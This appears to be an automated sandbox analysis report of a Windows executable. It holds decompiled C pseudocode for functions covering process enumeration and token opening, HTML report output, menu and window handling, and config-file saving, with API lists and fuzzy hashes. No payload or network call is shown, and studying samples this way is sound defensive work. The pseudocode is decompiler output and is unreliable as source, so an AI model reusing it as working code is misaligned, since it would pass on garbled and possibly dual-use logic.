                                                                                      				E0040B550(0x2204, __ecx);
                                                                                      				_v8712 = 0;
                                                                                      				memset( &_v8710, 0, 0x2000);
                                                                                      				_t17 = GetDlgCtrlID(_a4);
                                                                                      				_t34 = _t17;
                                                                                      				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                      				if(_t17 > 0 && _v8712 != 0) {
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                      					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                      					_t26 =  &_v516;
                                                                                      					_push(L"sysdatetimepick32");
                                                                                      					_push(_t26);
                                                                                      					L0040B278();
                                                                                      					if(_t26 != 0) {
                                                                                      						E00406025(_t34,  &_v8712);
                                                                                      					}
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 1028950076-4169760276
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00404706(long __edi, wchar_t* _a4) {
                                                                                      				short _v8;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				long _t14;
                                                                                      				long _t24;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				_t8 = 0;
                                                                                      				_t14 = 0x1100;
                                                                                      				if(__edi - 0x834 <= 0x383) {
                                                                                      					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                      					if(0 != 0) {
                                                                                      						_t14 = 0x1900;
                                                                                      					}
                                                                                      				}
                                                                                      				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                      					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                      				} else {
                                                                                      					if(wcslen(_v8) < 0x400) {
                                                                                      						wcscpy(_a4, _v8);
                                                                                      					}
                                                                                      					_t10 = LocalFree(_v8);
                                                                                      				}
                                                                                      				return _t10;
                                                                                      			}









                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                      • wcslen.MSVCRT ref: 00404756
                                                                                      • wcscpy.MSVCRT ref: 00404766
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                      • wcscpy.MSVCRT ref: 00404780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                      • String ID: netmsg.dll
                                                                                      • API String ID: 2767993716-3706735626
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				intOrPtr _v12;
                                                                                      				void* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char _v32;
                                                                                      				char _v72;
                                                                                      				void _v582;
                                                                                      				long _v584;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t27;
                                                                                      				wchar_t* _t34;
                                                                                      				wchar_t* _t42;
                                                                                      				long* _t43;
                                                                                      				int _t44;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      				long _t56;
                                                                                      				long* _t57;
                                                                                      				void* _t60;
                                                                                      
                                                                                      				_t60 = __eflags;
                                                                                      				_t52 = __edx;
                                                                                      				E004095AB( &_v72);
                                                                                      				_v584 = 0;
                                                                                      				memset( &_v582, 0, 0x1fe);
                                                                                      				E004095FD(_t52, _t60,  &_v72);
                                                                                      				_t27 = 0;
                                                                                      				_v12 = 0;
                                                                                      				if(_v20 <= 0) {
                                                                                      					L10:
                                                                                      					_t56 = 0;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t57 = E00405A92(_t27,  &_v32);
                                                                                      						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                      							goto L9;
                                                                                      						} else {
                                                                                      							_t34 =  &_v584;
                                                                                      							_push(_t34);
                                                                                      							_push(_a4);
                                                                                      							L0040B278();
                                                                                      							if(_t34 == 0) {
                                                                                      								L5:
                                                                                      								_t44 = 0;
                                                                                      								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                      								if(_t54 == 0) {
                                                                                      									goto L9;
                                                                                      								} else {
                                                                                      									_v16 = _v16 & 0;
                                                                                      									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                      										_t44 = 1;
                                                                                      										CloseHandle(_v16);
                                                                                      									}
                                                                                      									CloseHandle(_t54);
                                                                                      									if(_t44 != 0) {
                                                                                      										_t56 =  *_t57;
                                                                                      									} else {
                                                                                      										goto L9;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t42 = wcschr( &_v584, 0x5c);
                                                                                      								if(_t42 == 0) {
                                                                                      									goto L9;
                                                                                      								} else {
                                                                                      									_t43 =  &(_t42[0]);
                                                                                      									_push(_t43);
                                                                                      									_push(_a4);
                                                                                      									L0040B278();
                                                                                      									if(_t43 != 0) {
                                                                                      										goto L9;
                                                                                      									} else {
                                                                                      										goto L5;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						goto L12;
                                                                                      						L9:
                                                                                      						_t27 = _v12 + 1;
                                                                                      						_v12 = _t27;
                                                                                      					} while (_t27 < _v20);
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				L12:
                                                                                      				E004095DA( &_v72);
                                                                                      				return _t56;
                                                                                      			}






















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                        • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                        • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                        • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                        • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                        • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                        • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                        • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                        • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      • _wcsicmp.MSVCRT ref: 004059FA
                                                                                      • wcschr.MSVCRT ref: 00405A0E
                                                                                      • _wcsicmp.MSVCRT ref: 00405A20
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 768606695-0
                                                                                      • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                      • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				signed int _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				void _v68;
                                                                                      				char _v108;
                                                                                      				void _v160;
                                                                                      				void* __esi;
                                                                                      				signed int _t55;
                                                                                      				void* _t57;
                                                                                      				wchar_t* _t67;
                                                                                      				intOrPtr* _t73;
                                                                                      				signed int _t74;
                                                                                      				signed int _t86;
                                                                                      				signed int _t95;
                                                                                      				intOrPtr* _t98;
                                                                                      				void* _t100;
                                                                                      				void* _t102;
                                                                                      
                                                                                      				_t73 = __ebx;
                                                                                      				_t74 = 0xd;
                                                                                      				_push(9);
                                                                                      				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                      				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                      				_t102 = _t100 + 0x18;
                                                                                      				asm("movsw");
                                                                                      				E00407343(__ebx, _a4, L"<tr>");
                                                                                      				_t95 = 0;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                      						_v8 = _t55;
                                                                                      						_t57 =  &_v160;
                                                                                      						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                      							_t57 =  &_v68;
                                                                                      						}
                                                                                      						_t98 = _a8;
                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                      						_v20 = _v20 | 0xffffffff;
                                                                                      						_v16 = _v16 & 0x00000000;
                                                                                      						_v12 = _t57;
                                                                                      						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                      						E0040ADC0(_v28,  &_v108);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                      						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                      						_t67 =  *(_t73 + 0x64);
                                                                                      						_t86 =  *_t67 & 0x0000ffff;
                                                                                      						if(_t86 == 0 || _t86 == 0x20) {
                                                                                      							wcscat(_t67, L"&nbsp;");
                                                                                      						}
                                                                                      						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                      						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                      						_push( &_v108);
                                                                                      						_push(_v12);
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                      						L0040B1EC();
                                                                                      						_t102 = _t102 + 0x1c;
                                                                                      						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                      						_t95 = _t95 + 1;
                                                                                      					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t73, _a4, L"\r\n");
                                                                                      			}
























                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscat
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 384018552-4153097237
                                                                                      • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                      • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 42%
                                                                                      			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                      				struct tagMENUITEMINFOW _v0;
                                                                                      				int _t24;
                                                                                      				wchar_t* _t30;
                                                                                      				intOrPtr _t32;
                                                                                      				int _t34;
                                                                                      				int _t42;
                                                                                      				signed int _t47;
                                                                                      				signed int _t48;
                                                                                      
                                                                                      				_t36 = __ecx;
                                                                                      				_t48 = _t47 & 0xfffffff8;
                                                                                      				E0040B550(0x203c, __ecx);
                                                                                      				_t24 = GetMenuItemCount(_a8);
                                                                                      				_t34 = _t24;
                                                                                      				_t42 = 0;
                                                                                      				if(_t34 <= 0) {
                                                                                      					L13:
                                                                                      					return _t24;
                                                                                      				} else {
                                                                                      					goto L1;
                                                                                      				}
                                                                                      				do {
                                                                                      					L1:
                                                                                      					memset( &_a50, 0, 0x2000);
                                                                                      					_t48 = _t48 + 0xc;
                                                                                      					_a36 =  &_a48;
                                                                                      					_v0.cbSize = 0x30;
                                                                                      					_a4 = 0x36;
                                                                                      					_a40 = 0x1000;
                                                                                      					_a16 = 0;
                                                                                      					_a48 = 0;
                                                                                      					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                      					if(_t24 == 0) {
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					if(_a48 == 0) {
                                                                                      						L10:
                                                                                      						_t56 = _a20;
                                                                                      						if(_a20 != 0) {
                                                                                      							_push(0);
                                                                                      							_push(_a20);
                                                                                      							_push(_a4);
                                                                                      							_t24 = E0040605E(_t36, _t56);
                                                                                      							_t48 = _t48 + 0xc;
                                                                                      						}
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t30 = wcschr( &_a48, 9);
                                                                                      					if(_t30 != 0) {
                                                                                      						 *_t30 = 0;
                                                                                      					}
                                                                                      					_t31 = _a16;
                                                                                      					if(_a20 != 0) {
                                                                                      						if(_a12 == 0) {
                                                                                      							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                      							_t32 =  *0x40fe20; // 0x0
                                                                                      							_t31 = _t32 + 0x11558;
                                                                                      							__eflags = _t32 + 0x11558;
                                                                                      						} else {
                                                                                      							_t17 = _t42 + 0x11171; // 0x11171
                                                                                      							_t31 = _t17;
                                                                                      						}
                                                                                      					}
                                                                                      					_t24 = E00406025(_t31,  &_a48);
                                                                                      					_pop(_t36);
                                                                                      					goto L10;
                                                                                      					L12:
                                                                                      					_t42 = _t42 + 1;
                                                                                      				} while (_t42 < _t34);
                                                                                      				goto L13;
                                                                                      			}












                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2029023288-3849865405
                                                                                      • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                      • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00402BEE(void* __ebx) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				int _v24;
                                                                                      				int _v28;
                                                                                      				void* _t27;
                                                                                      				int _t31;
                                                                                      				void* _t34;
                                                                                      				int _t37;
                                                                                      				int _t38;
                                                                                      				int _t41;
                                                                                      				int _t50;
                                                                                      
                                                                                      				_t34 = __ebx;
                                                                                      				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                      					return _t27;
                                                                                      				} else {
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					asm("movsd");
                                                                                      					_v8 = GetSystemMetrics(0x4e);
                                                                                      					_v12 = GetSystemMetrics(0x4f);
                                                                                      					_t41 = GetSystemMetrics(0x4c);
                                                                                      					_t31 = GetSystemMetrics(0x4d);
                                                                                      					if(_v8 == 0 || _v12 == 0) {
                                                                                      						_v8 = GetSystemMetrics(0);
                                                                                      						_v12 = GetSystemMetrics(1);
                                                                                      						_t41 = 0;
                                                                                      						_t31 = 0;
                                                                                      					} else {
                                                                                      						_v8 = _v8 + _t41;
                                                                                      						_v12 = _v12 + _t31;
                                                                                      					}
                                                                                      					_t50 = _v20 - _v28;
                                                                                      					if(_t50 > 0x14) {
                                                                                      						_t38 = _v24;
                                                                                      						_t37 = _v16 - _t38;
                                                                                      						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                      							_t31 = _t31 + 0xfffffff6;
                                                                                      							if(_t38 >= _t31) {
                                                                                      								_t31 = _v28;
                                                                                      								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                      									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					return _t31;
                                                                                      				}
                                                                                      			}

















                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                      • GetSystemMetrics.USER32 ref: 00402C23
                                                                                      • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                      • GetSystemMetrics.USER32 ref: 00402C30
                                                                                      • GetSystemMetrics.USER32 ref: 00402C47
                                                                                      • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$Window
                                                                                      • String ID:
                                                                                      • API String ID: 1155976603-0
                                                                                      • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                      • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004036D5(void* __edi, void* __eflags) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char* _v24;
                                                                                      				char _v28;
                                                                                      				char* _v48;
                                                                                      				intOrPtr _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				int _v64;
                                                                                      				int _v72;
                                                                                      				intOrPtr _v76;
                                                                                      				wchar_t* _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				int _v92;
                                                                                      				char* _v96;
                                                                                      				intOrPtr _v104;
                                                                                      				struct tagOFNA _v108;
                                                                                      				void _v634;
                                                                                      				long _v636;
                                                                                      				void _v2682;
                                                                                      				char _v2684;
                                                                                      				void* __ebx;
                                                                                      				char _t37;
                                                                                      				intOrPtr _t38;
                                                                                      				int _t46;
                                                                                      				signed short _t54;
                                                                                      
                                                                                      				_v636 = 0;
                                                                                      				memset( &_v634, 0, 0x208);
                                                                                      				_v2684 = 0;
                                                                                      				memset( &_v2682, 0, 0x7fe);
                                                                                      				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                      				_v12 = _t37;
                                                                                      				_t38 =  *0x40cbf0; // 0x67
                                                                                      				_v8 = _t38;
                                                                                      				_v28 = E00405B81(0x227);
                                                                                      				_v24 = L"*.cfg";
                                                                                      				_v20 = E00405B81(0x228);
                                                                                      				_v16 = L"*.*";
                                                                                      				E00405236( &_v2684,  &_v28);
                                                                                      				_t54 = 0xa;
                                                                                      				_v60 = E00405B81(_t54);
                                                                                      				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                      				_v48 =  &_v12;
                                                                                      				_v96 =  &_v2684;
                                                                                      				_v108 = 0x4c;
                                                                                      				_v92 = 0;
                                                                                      				_v84 = 1;
                                                                                      				_v80 =  &_v636;
                                                                                      				_v76 = 0x104;
                                                                                      				_v72 = 0;
                                                                                      				_v64 = 0;
                                                                                      				_v56 = 0x80806;
                                                                                      				_t46 = GetSaveFileNameW( &_v108);
                                                                                      				if(_t46 != 0) {
                                                                                      					wcscpy( &_v636, _v80);
                                                                                      					return E0040365E(__edi, 1,  &_v636);
                                                                                      				}
                                                                                      				return _t46;
                                                                                      			}

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004036F6
                                                                                      • memset.MSVCRT ref: 00403712
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                        • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                        • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                      • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                      • wcscpy.MSVCRT ref: 004037C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                      • String ID: L$cfg
                                                                                      • API String ID: 275899518-3734058911
                                                                                      • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                      • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                      				struct _SYSTEMTIME _v20;
                                                                                      				long _v276;
                                                                                      				long _v532;
                                                                                      				FILETIME* _t15;
                                                                                      
                                                                                      				_t15 = __eax;
                                                                                      				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                      					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                      						goto L5;
                                                                                      					} else {
                                                                                      						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                      						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                      						wcscpy(_a4,  &_v276);
                                                                                      						wcscat(_a4, " ");
                                                                                      						wcscat(_a4,  &_v532);
                                                                                      					}
                                                                                      				} else {
                                                                                      					L5:
                                                                                      					wcscpy(_a4, 0x40c4e8);
                                                                                      				}
                                                                                      				return _a4;
                                                                                      			}

                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                      • wcscpy.MSVCRT ref: 00404F41
                                                                                      • wcscat.MSVCRT ref: 00404F4E
                                                                                      • wcscat.MSVCRT ref: 00404F5D
                                                                                      • wcscpy.MSVCRT ref: 00404F71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1331804452-0
                                                                                      • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
